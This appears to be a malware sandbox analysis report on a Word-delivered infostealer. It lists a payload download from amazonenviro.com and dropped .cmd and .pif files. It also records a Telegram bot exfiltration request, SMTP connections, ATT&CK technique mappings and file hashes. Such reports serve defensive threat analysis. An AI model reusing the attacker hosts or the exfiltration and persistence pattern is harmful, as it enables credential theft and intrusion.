https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

tls, http

WINWORD.EXE

2.1kB
34.9kB
27
30

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

tls, http

WINWORD.EXE

1.9kB
27.7kB
24
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

tls, http

WINWORD.EXE

2.5kB
41.7kB
33
36

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

tls, http

WINWORD.EXE

2.8kB
38.7kB
32
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

tls, http

WINWORD.EXE

1.7kB
32.9kB
20
30

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

tls, http

WINWORD.EXE

2.7kB
29.6kB
29
28

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

tls, http

WINWORD.EXE

1.6kB
31.2kB
19
29

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

tls, http

WINWORD.EXE

1.7kB
26.3kB
18
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

tls, http

WINWORD.EXE

77.8kB
3.5MB
1464
2535

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

tls, http

WINWORD.EXE

1.6kB
29.4kB
18
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

tls, http

WINWORD.EXE

20.9kB
725.5kB
356
526

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

tls, http

WINWORD.EXE

35.3kB
1.1MB
586
822

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

tls, http

WINWORD.EXE

58.9kB
1.9MB
991
1405

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

HTTP Response

200
166.62.27.188:443

amazonenviro.com

brightness.exe

190 B
92 B
4
2
166.62.27.188:443

https://amazonenviro.com/admin/245_Nsltarpncon

tls, http

brightness.exe

18.1kB
815.1kB
359
592

HTTP Request

GET https://amazonenviro.com/admin/245_Nsltarpncon

HTTP Response

200
193.122.6.168:80

http://checkip.dyndns.org/

http

npratlsN.pif

2.0kB
3.3kB
16
14

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200
104.21.16.1:443

https://reallyfreegeoip.org/xml/181.215.176.83

tls, http

npratlsN.pif

1.8kB
15.2kB
17
16

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:HGNBWBGW%0D%0ADate%20and%20Time:%201/14/2025%20/%207:07:51%20AM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20HGNBWBGW%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

tls, http

npratlsN.pif

1.2kB
6.7kB
11
11

HTTP Request

GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:HGNBWBGW%0D%0ADate%20and%20Time:%201/14/2025%20/%207:07:51%20AM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20HGNBWBGW%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

HTTP Response

404
46.151.208.21:587

mail.irco.com.sa

smtp

npratlsN.pif

2.3kB
4.0kB
20
19
46.151.208.21:587

mail.irco.com.sa

smtp

npratlsN.pif

2.7kB
4.0kB
18
20

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

20.49.80.91.in-addr.arpa

dns

70 B
145 B
1
1

DNS Request

20.49.80.91.in-addr.arpa
8.8.8.8:53

roaming.officeapps.live.com

dns

WINWORD.EXE

73 B
247 B
1
1

DNS Request

roaming.officeapps.live.com

DNS Response

52.109.89.19
8.8.8.8:53

19.89.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

19.89.109.52.in-addr.arpa
8.8.8.8:53

113.216.124.147.in-addr.arpa

dns

74 B
140 B
1
1

DNS Request

113.216.124.147.in-addr.arpa
8.8.8.8:53

0.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

0.159.190.20.in-addr.arpa
8.8.8.8:53

167.173.78.104.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

167.173.78.104.in-addr.arpa
8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

122.10.44.20.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

122.10.44.20.in-addr.arpa
8.8.8.8:53

metadata.templates.cdn.office.net

dns

WINWORD.EXE

79 B
231 B
1
1

DNS Request

metadata.templates.cdn.office.net

DNS Response

23.48.165.159

23.48.165.161
8.8.8.8:53

binaries.templates.cdn.office.net

dns

WINWORD.EXE

79 B
202 B
1
1

DNS Request

binaries.templates.cdn.office.net

DNS Response

2.18.190.198

2.18.190.195
8.8.8.8:53

159.165.48.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

159.165.48.23.in-addr.arpa
8.8.8.8:53

198.190.18.2.in-addr.arpa

dns

142 B
135 B
2
1

DNS Request

198.190.18.2.in-addr.arpa

DNS Request

198.190.18.2.in-addr.arpa
8.8.8.8:53

amazonenviro.com

dns

brightness.exe

62 B
78 B
1
1

DNS Request

amazonenviro.com

DNS Response

166.62.27.188
8.8.8.8:53

188.27.62.166.in-addr.arpa

dns

72 B
121 B
1
1

DNS Request

188.27.62.166.in-addr.arpa
8.8.8.8:53

200.163.202.172.in-addr.arpa

dns

74 B
160 B
1
1

DNS Request

200.163.202.172.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

92.12.20.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

92.12.20.2.in-addr.arpa
8.8.8.8:53

checkip.dyndns.org

dns

npratlsN.pif

64 B
176 B
1
1

DNS Request

checkip.dyndns.org

DNS Response

193.122.6.168

132.226.247.73

193.122.130.0

158.101.44.242

132.226.8.169
8.8.8.8:53

reallyfreegeoip.org

dns

npratlsN.pif

65 B
177 B
1
1

DNS Request

reallyfreegeoip.org

DNS Response

104.21.16.1

104.21.32.1

104.21.64.1

104.21.112.1

104.21.48.1

104.21.96.1

104.21.80.1
8.8.8.8:53

168.6.122.193.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

168.6.122.193.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

npratlsN.pif

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

1.16.21.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

1.16.21.104.in-addr.arpa
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

mail.irco.com.sa

dns

npratlsN.pif

62 B
78 B
1
1

DNS Request

mail.irco.com.sa

DNS Response

46.151.208.21
8.8.8.8:53

21.208.151.46.in-addr.arpa

dns

72 B
104 B
1
1

DNS Request

21.208.151.46.in-addr.arpa
8.8.8.8:53

134.130.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

134.130.81.91.in-addr.arpa
8.8.8.8:53

31.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

31.243.111.52.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

234.17.178.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

234.17.178.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDDF0F.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crgwbpmr.gvp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\brightness.exe

Filesize
1.4MB

MD5
8d3e16cb3ce3940e87a322fbeeab419f

SHA1
5a1e2a3e55b6d8e77f6b038e171034d50a5b97d9

SHA256
d3155fcf6f052606bc5f0c293aa6ee43d27bf7990713863e2dd23ab870fbb0bf

SHA512
683329d2b9c7aed5c2f03572503c601a866dd3c28c4292bce4453afc509458b20d7183729d284d1961fe3b126b8312712fc4903b8a1d41ab9738dc49455f5911

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
672B

MD5
c439525b304cf0daf716ba7cef3200a7

SHA1
29734bbcafdc4e0a709bd5e8442bc7cd7aa29b9b

SHA256
2c31eb439c671830a97d8c0e76c034dfc6d446dc91f2e26a3e554df77730e6e9

SHA512
7d6fb3d80b61f3c008e1d8f2aff800f0398e22e5786eaf5f8d56b7de13923526297734df7ea07352ca5cd1aae4d476877dc20c86f959fc4d5d65ac49f3c6cc66

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
7821e3de3812e791cf3b223500d73bc9

SHA1
5e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d

SHA256
3daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74

SHA512
6eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26

Download Submit
C:\Users\Public\Libraries\NEO.cmd

Filesize
27KB

MD5
e24fa8fb365a89779b026772b9342af3

SHA1
b90de3c9f3093ca8badfaf6c98218b744087e8f9

SHA256
10d7b4ea056fc1037109fe6e6694849d145b0745faa9ae02957104a2834a14a0

SHA512
a32f7a29c4c8cc831a5057b8db31f79e7dedb9172ac9705da6a8da65384ed23827c3cccdb833562cdab63addd679341707a2b46bbc8c802845cbbbbb01771d10

Download Submit
C:\Users\Public\Libraries\npratlsN.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\NsltarpnF.cmd

Filesize
11KB

MD5
f82aeb3b12f33250e404df6ec873dd1d

SHA1
bcf538f64457e8d19da89229479cafa9c4cce12f

SHA256
23b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6

SHA512
6f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977

Download Submit
C:\Users\Public\xkn.pif

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \SysWOW64\netutils.dll

Filesize
116KB

MD5
a88976a70aed45f610a032e438a82a95

SHA1
ec20b0f0d6ccc848c8ffa857ab4e771672dfa4f2

SHA256
f3d5a6ebcd8cab3cc9a98488b23c2de740c6ef04e33ed317a3e2a047d53d169b

SHA512
ec77bb81b9e6de4af8a17eb26281d10fc9a05947d588f2ee3680ada67ed28118fbc9a2d0e63bf0ecc2a4c318555a4f27e72ecf1a530a506e9b4fbf5efdb4f676

Download Submit
C:\Windows \SysWOW64\svchost.pif

Filesize
94KB

MD5
869640d0a3f838694ab4dfea9e2f544d

SHA1
bdc42b280446ba53624ff23f314aadb861566832

SHA256
0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323

SHA512
6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

Download Submit
memory/1096-14-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-0-0x00007FFB06470000-0x00007FFB06480000-memory.dmp

Filesize
64KB

Download
memory/1096-11-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-9-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-8-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-17-0x00007FFB04410000-0x00007FFB04420000-memory.dmp

Filesize
64KB

Download
memory/1096-26-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-25-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-37-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-13-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-16-0x00007FFB04410000-0x00007FFB04420000-memory.dmp

Filesize
64KB

Download
memory/1096-15-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-193-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-12-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-10-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-7-0x00007FFB06470000-0x00007FFB06480000-memory.dmp

Filesize
64KB

Download
memory/1096-5-0x00007FFB06470000-0x00007FFB06480000-memory.dmp

Filesize
64KB

Download
memory/1096-4-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-6-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-1-0x00007FFB06470000-0x00007FFB06480000-memory.dmp

Filesize
64KB

Download
memory/1096-236-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-234-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1096-2-0x00007FFB06470000-0x00007FFB06480000-memory.dmp

Filesize
64KB

Download
memory/1096-3-0x00007FFB4648D000-0x00007FFB4648E000-memory.dmp

Filesize
4KB

Download
memory/1264-708-0x00000128D35E0000-0x00000128D3602000-memory.dmp

Filesize
136KB

Download
memory/1972-85-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-61-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-68-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-89-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-88-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-91-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-97-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-96-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-95-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-94-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-93-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-92-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-90-0x0000000002980000-0x0000000003980000-memory.dmp

Filesize
16.0MB

Download
memory/1972-87-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-86-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-42-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-84-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-83-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-82-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-81-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-79-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-78-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-77-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-76-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-73-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-72-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-71-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-70-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-69-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-67-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-66-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-65-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-64-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-57-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-63-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-62-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-80-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-60-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-59-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-58-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-75-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-74-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-49-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-44-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-46-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-55-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-56-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-237-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1972-48-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-47-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-50-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-51-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-52-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-54-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-53-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-45-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-43-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/1972-41-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/1972-953-0x00007FFB463F0000-0x00007FFB465E5000-memory.dmp

Filesize
2.0MB

Download
memory/3748-954-0x000000001FE40000-0x000000001FEA0000-memory.dmp

Filesize
384KB

Download
memory/3748-955-0x000000001FF70000-0x0000000020514000-memory.dmp

Filesize
5.6MB

Download
memory/3748-956-0x0000000020520000-0x000000002057C000-memory.dmp

Filesize
368KB

Download
memory/3748-2049-0x0000000020580000-0x000000002061C000-memory.dmp

Filesize
624KB

Download
memory/3748-2051-0x0000000021410000-0x00000000215D2000-memory.dmp

Filesize
1.8MB

Download
memory/3748-2052-0x0000000021620000-0x0000000021670000-memory.dmp

Filesize
320KB

Download
memory/3748-2053-0x0000000021710000-0x0000000021C3C000-memory.dmp

Filesize
5.2MB

Download
memory/3748-2060-0x0000000021CA0000-0x0000000021D32000-memory.dmp

Filesize
584KB

Download
memory/3748-2061-0x0000000021EC0000-0x0000000021ECA000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request